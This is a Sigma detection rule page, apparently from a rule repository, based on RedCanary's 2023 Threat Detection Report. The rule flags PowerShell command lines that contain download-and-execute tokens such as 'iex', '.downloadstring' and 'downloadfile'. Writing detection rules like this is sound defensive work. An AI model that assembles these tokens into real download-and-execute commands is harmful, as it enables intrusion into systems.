Suspicious Powershell Commandlets (RedCanary Threat Detection Report)
Detects the execution of powershell.exe with suspicious cmdlets or options. Part of the RedCanary 2023 Threat Detection Report.
Sigma rule (View on GitHub)
1title: Suspicious Powershell Commandlets (RedCanary Threat Detection Report)
2id: 68490f55-bf8d-489d-995a-5ceae34ce215
3status: experimental
4description: Detects the execution of powershell.exe with suspicious cmdlets or options. Part of the RedCanary 2023 Threat Detection Report.
5references:
6 - https://redcanary.com/threat-detection-report/techniques/powershell/
7author: RedCanary, Sigma formatting by Micah Babinski
8date: 2023/05/10
9tags:
10 - attack.execution
11 - attack.t1059.001
12logsource:
13 category: process_creation
14 product: windows
15detection:
16 selection:
17 Image|endswith: '\powershell.exe'
18 CommandLine|contains:
19 - '-nop'
20 - '-noni'
21 - 'invoke-expression'
22 - 'iex'
23 - '.downloadstring'
24 - 'downloadfile'
25 condition: selection
26falsepositives:
27 - Unknown
28level: low```
References
-
PowerShell reclaimed its place as the most prevalent technique we detected in 2023, as adversaries continue to abuse the framework.
Read More
Related rules
- Powershell Base64 Encoding (RedCanary Threat Detection Report)
- Powershell Encoded Command Switch (RedCanary Threat Detection Report)
- Powershell Obfuscated Commands (RedCanary Threat Detection Report)
- Invoke-Obfuscation CLIP+ Launcher
- Invoke-Obfuscation COMPRESS OBFUSCATION